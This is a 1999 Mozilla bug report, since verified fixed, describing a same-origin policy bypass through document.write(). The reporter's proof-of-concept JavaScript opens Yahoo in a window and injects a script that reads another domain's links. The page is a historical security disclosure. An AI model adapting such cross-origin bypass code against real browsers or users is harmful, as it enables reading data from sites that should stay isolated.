Closed
Bug 14443
Opened 25 years ago
Closed 25 years ago
"Same origin" security policy may be circumvented using document.write()
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
On builds 1999092013 and 1999091914 "Same origin" security may be circumvented using document.write(). I have made a demonstration that reads links from documents from another domain, I am pretty sure access to other elements may be done. The code that reads links from Yahoo is: -------------------------------------- <SCRIPT> a=window.open("http://www.yahoo.com","a"); setTimeout('a.document.open();a.document.write("<SCRIPT>b=window.open(\'http://w ww.yahoo.com\');s=\'Here is the first link from Yahoo: \';setTimeout(\'alert(s+b.document.links[0].href)\',20000);</"+"SCRIPT>");a.docu ment.close();',20000); </SCRIPT> -------------------------------------- Demonstration is available at: http://www.nat.bg/~joro/mozilla/links1.html
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Windows NT 1999120208 Comm Verified ...'[Exception... "Security error"'...
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•